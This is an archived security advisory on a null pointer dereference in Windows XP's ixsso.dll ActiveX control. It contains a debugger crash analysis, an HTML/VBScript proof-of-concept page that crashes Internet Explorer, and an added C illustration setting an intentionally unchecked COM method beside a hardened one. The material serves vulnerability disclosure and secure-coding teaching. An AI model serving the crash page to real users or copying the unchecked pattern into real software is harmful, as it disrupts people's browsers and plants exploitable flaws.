Microsoft Indexing Service Null Pointer Dereference

Posted Aug 24, 2012
Authored by coolkaveh

Microsoft Indexing Service suffers from a server-side (ixsso.dll) null pointer dereference vulnerability.

tags | advisory
MD5 | 91b15636e73787217decec485b2d2a8c

Exploit Title: Microsoft Indexing Service Server-side (ixsso.dll) null pointer dereference
Crash : http://img836.imageshack.us/img836/7742/microsoftf.png
Date: 2012-08-24
Author: coolkaveh
coolkaveh@rocketmail.com
https://twitter.com/coolkaveh
Vendor Homepage: http://www.microsoft.com/
Version: 5.1.2600.5512
Tested on: Windows XP SP3 ENG
Greets To Mohammad Morteza Sanaie
sanaie.morteza@gmail.com
-----------------------------------------------------------------------------------------
Class CissoQuery
GUID: {A4463024-2B6F-11D0-BFBC-0020F8008024}
Number of Interfaces: 1
Default Interface: IixssoQuery
RegKey Safe for Script: True
RegKey Safe for Init: True
-----------------------------------------------------------------------------------------
Report for Clsid: {A4463024-2B6F-11D0-BFBC-0020F8008024}
RegKey Safe for Script: True
RegKey Safe for Init: True
Implements IObjectSafety: True
IDisp Safe: Safe for untrusted: caller
-----------------------------------------------------------------------------------------
(c8c.85c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=02e126d0 ecx=774fef18 edx=0020e5ea esi=0020e5c4 edi=00000000
eip=65da3d35 esp=02a4f070 ebp=02a4f098 iopl=0 nv up ei ng nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010286
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\system32\ixsso.dll -
ixsso!DllCanUnloadNow+0xeac:
65da3d35 8b08 mov ecx,dword ptr [eax] ds:0023:00000000=????????
Missing image name, possible paged-out or corrupt data.
0:012> !load winext\msec.dll
0:012> !exploitable -v
HostMachine\HostUser
Executing Processor Architecture is x86
Debuggee is in User Mode
Debuggee is a live user mode debugging session on the local machine
Event Type: Exception
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\system32\OLEAUT32.dll -
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\system32\mshtml.dll -
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\system32\vbscript.dll -
Exception Faulting Address: 0x0
First Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC0000005)
Exception Sub-Type: Read Access Violation

Faulting Instruction:65da3d35 mov ecx,dword ptr [eax]

Basic Block:
65da3d35 mov ecx,dword ptr [eax]
Tainted Input Operands: eax
65da3d37 lea edx,[ebp+8]
65da3d3a push edx
65da3d3b push offset ixsso+0x1400 (65da1400)
65da3d40 push eax
Tainted Input Operands: eax
65da3d41 mov dword ptr [ebp+8],edi
65da3d44 mov dword ptr [ebp-0ch],edi
65da3d47 mov dword ptr [ebp-8],edi
65da3d4a mov dword ptr [ebp-4],edi
65da3d4d call dword ptr [ecx]
Tainted Input Operands: ecx, StackContents

Exception Hash (Major/Minor): 0x3716130a.0x43133e77

Stack Trace:
ixsso!DllCanUnloadNow+0xeac
OLEAUT32!DispCallFunc+0xc3
OLEAUT32!DispCallFunc+0x6d2
OLEAUT32!DispInvoke+0x23
ixsso!DllCanUnloadNow+0x391
mshtml!com_ms_osp_ospmrshl_releaseByValExternal+0xc86d3
mshtml!com_ms_osp_ospmrshl_releaseByValExternal+0xc8ce9
mshtml!com_ms_osp_ospmrshl_releaseByValExternal+0xc8736
vbscript!DllGetClassObject+0x12b6d
vbscript!DllGetClassObject+0x12ae0
vbscript!DllGetClassObject+0x12a81
vbscript+0x3da8
vbscript+0x40bf
vbscript+0x6412
vbscript+0x6397
vbscript+0x6bed
vbscript+0x6de5
vbscript!DllCanUnloadNow+0x15b6
vbscript+0xa306
mshtml+0xa195b
mshtml+0xa1804
mshtml+0xa18f0
mshtml+0xa06f5
Instruction Address: 0x0000000065da3d35

Description: Data from Faulting Address controls Code Flow
Short Description: TaintedDataControlsCodeFlow
Exploitability Classification: PROBABLY_EXPLOITABLE
Recommended Bug Title: Probably Exploitable - Data from Faulting Address controls Code Flow starting at ixsso!DllCanUnloadNow+0x0000000000000eac (Hash=0x3716130a.0x43133e77)

The data from the faulting address is later used as the target for a branch.
-----------------------------------------------------------------------------------------
<html>
Exploit
<!-- Instantiate Cisso.CissoQuery (ixsso.dll) by CLSID; the control is registered safe for scripting, so IE lets page script call its members -->
<object classid='clsid:A4463024-2B6F-11D0-BFBC-0020F8008024' id='target'></object>
<script language='vbscript'>
' COMRaider-style metadata describing the member under test
targetFile = "C:\WINDOWS\system32\ixsso.dll"
prototype = "Property Let OnStartPage As object"
memberName = "OnStartPage"
progid = "Cisso.CissoQuery"
argCount = 1

' OnStartPage expects the ASP scripting context as an object (IUnknown); Nothing hands it a NULL interface pointer
Set arg1=Nothing

' ixsso.dll dereferences the NULL pointer to reach its vtable and faults at address 0
target.OnStartPage arg1
</script>
</html>
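The basic block in the !exploitable output is a COM interface call through a null object pointer. eax, the IUnknown* that OnStartPage receives (the ASP scripting context, which the PoC passes as Nothing), is 0; mov ecx,[eax] tries to read its vtable from address 0 and faults, and had it succeeded, call dword ptr [ecx] would have invoked vtable slot 0, QueryInterface, with the arguments pushed just before it (an out pointer at [ebp+8] and a REFIID at ixsso+0x1400). !exploitable rates this PROBABLY_EXPLOITABLE because the loaded value feeds a branch, but the faulting address is 0x0: code flow is only controlled by whoever can map the null page in the hosting process, which page script in IE cannot do, so the practical impact is a reliable crash of the IE tab or of whatever host instantiates the control. The C program below is an added illustration of that pattern, not code from the advisory or from ixsso.dll. It mocks IUnknown with a plain vtable struct so it builds without windows.h, shows an OnStartPage that dereferences the context unconditionally next to one that rejects a NULL context with E_POINTER, and uses a made-up IID in place of the constant at ixsso+0x1400; the names OnStartPage_vulnerable, OnStartPage_hardened and Ctx are assumptions for the illustration.

```c
/*
 * Added illustration (not from the advisory, not ixsso.dll code): a method
 * that receives a COM interface pointer and calls through it without a NULL
 * check, next to the hardened version. COM is mocked with plain C structs.
 *
 * In the crash, eax (the IUnknown*) is 0, "mov ecx,[eax]" loads the vtable
 * from address 0, and "call dword ptr [ecx]" would invoke slot 0,
 * QueryInterface(this, riid, ppv).
 */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

typedef int32_t HRESULT;
#define S_OK          ((HRESULT)0x00000000)
#define E_NOINTERFACE ((HRESULT)0x80004002)
#define E_POINTER     ((HRESULT)0x80004003)

typedef struct { uint32_t d1; uint16_t d2, d3; uint8_t d4[8]; } GUID;
typedef const GUID *REFIID;

/* Minimal IUnknown: slot 0 is QueryInterface, the slot the crash reaches. */
typedef struct IUnknown IUnknown;
typedef struct {
    HRESULT  (*QueryInterface)(IUnknown *self, REFIID riid, void **ppv);
    uint32_t (*AddRef)(IUnknown *self);
    uint32_t (*Release)(IUnknown *self);
} IUnknownVtbl;
struct IUnknown { const IUnknownVtbl *lpVtbl; };

/* Made-up IID (assumption) standing in for the constant at ixsso+0x1400,
 * whose value the advisory does not show. */
static const GUID IID_ScriptingContextStub =
    { 0x5aa6d4a1, 0x3b2c, 0x4e17, { 0x9f, 0x21, 0x44, 0x8a, 0xb0, 0x17, 0x6c, 0x02 } };

/* Vulnerable shape: trusts pUnk and dereferences it unconditionally.
 * With pUnk == NULL this reads address 0, the advisory's faulting address. */
static HRESULT OnStartPage_vulnerable(IUnknown *pUnk, void **ppCtx)
{
    *ppCtx = NULL;
    return pUnk->lpVtbl->QueryInterface(pUnk, &IID_ScriptingContextStub, ppCtx);
}

/* Hardened shape: validate both pointers before touching them. A script
 * passing Nothing now gets a failure HRESULT instead of crashing the host. */
static HRESULT OnStartPage_hardened(IUnknown *pUnk, void **ppCtx)
{
    if (ppCtx == NULL)
        return E_POINTER;
    *ppCtx = NULL;
    if (pUnk == NULL)
        return E_POINTER;
    return pUnk->lpVtbl->QueryInterface(pUnk, &IID_ScriptingContextStub, ppCtx);
}

/* Toy object implementing IUnknown so the valid path can be exercised. */
typedef struct { IUnknown unk; uint32_t refs; } Ctx;

static HRESULT Ctx_QueryInterface(IUnknown *self, REFIID riid, void **ppv)
{
    if (memcmp(riid, &IID_ScriptingContextStub, sizeof *riid) == 0) {
        *ppv = self;
        self->lpVtbl->AddRef(self);   /* COM rule: QI hands out a reference */
        return S_OK;
    }
    *ppv = NULL;
    return E_NOINTERFACE;
}
static uint32_t Ctx_AddRef(IUnknown *self)  { return ++((Ctx *)self)->refs; }
static uint32_t Ctx_Release(IUnknown *self) { return --((Ctx *)self)->refs; }
static const IUnknownVtbl Ctx_vtbl = { Ctx_QueryInterface, Ctx_AddRef, Ctx_Release };

/* Initialises a context object; the caller holds one reference. */
static void Ctx_init(Ctx *c) { c->unk.lpVtbl = &Ctx_vtbl; c->refs = 1; }

int main(void)
{
    Ctx ctx;
    void *got = NULL;
    Ctx_init(&ctx);

    /* What the PoC does: OnStartPage with Nothing. Only the hardened
     * version survives this call; the vulnerable one would fault at 0. */
    printf("hardened(NULL)  -> 0x%08x\n", (unsigned)OnStartPage_hardened(NULL, &got));

    /* The intended ASP path: a real context object is supplied. */
    printf("hardened(ctx)   -> 0x%08x, refs=%u\n",
           (unsigned)OnStartPage_hardened(&ctx.unk, &got), ctx.refs);
    printf("vulnerable(ctx) -> 0x%08x, refs=%u\n",
           (unsigned)OnStartPage_vulnerable(&ctx.unk, &got), ctx.refs);
    return 0;
}
```

Build with any C99 compiler (for example cc -std=c99 -Wall null_iunknown.c). The hardened version mirrors the ordinary COM contract for out parameters: clear *ppCtx first, then refuse a missing source object, so a caller never sees stale pointer data on the failure path.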